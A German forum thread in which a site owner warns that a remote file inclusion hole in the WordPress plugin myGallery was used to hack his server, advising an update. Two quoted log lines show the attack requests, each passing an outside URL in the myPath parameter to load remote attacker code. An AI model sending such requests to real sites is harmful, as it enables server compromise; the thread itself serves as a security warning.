30. June 2007, 16:21 | #1 |
Erde, Wind & Feuer
Registriert seit: February 2002
Ort: Ockershausen
Beiträge: 7.669
|
MyGallery - Wordpress Plugin, unbedingt updaten
Ich setze auf einer anderen Domain Wordpress ein und habe dort zum darstellen von Bildern das geniale Plugin myGallery dort ebenfalls im Einsatz.
Gestern nachmittag war es dann soweit, ein Blick ins Apache log zeigte mir, dass gerade seit fünf Minuten, sich da jemand auf den Server gehacked hatte. Ein "locate" nach dieser Datei, die per wget runtergeladen wurde zeigte mir den Ort. Es war im myGallery Verzeichnis. Ein kurzer Blick in das Apachelog dieser Domain zeigt die genaue Vorgehensweise und das Sicherheitsloch: 87.6.146.147 - - [29/Jun/2007:14:40:33 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.bgsuedpark.de/data/ xxxxxxxxxxxxxx? HTTP/1.1" 200 9957 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" Ein anschließendes Durchsuchen des Changelogs der aktuellen myGallery Version brachte den Hinweis auf einen geschlossenen Sicherheitsbug: Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability Also schnell das Update eingespielt, die Datei gelöscht und schon war wieder Ruhe. Ich kann also nur jeden raten, der dieses Plugin verwendet, auf die neuste Version zu updaten. xxxxxxxxxx = abgeändert. |
8. January 2008, 22:17 | #2 |
Erde, Wind & Feuer
Registriert seit: February 2002
Ort: Ockershausen
Beiträge: 7.669
|
Ach wie süß ist das denn?
Leute hier läuft vBulletin, nicht Wordpress. skats.de kann also niemals diese Lücke haben, aber wenns schön macht. Code:
08.01.2008 22:10:08 - 207.210.91.2 unlimited1.dnsprotect.com - www.skats.de/software//mygallery/myfunctions/mygallerybrowser.php?myPath=http://zenteno.org/z/safe2.txt??? |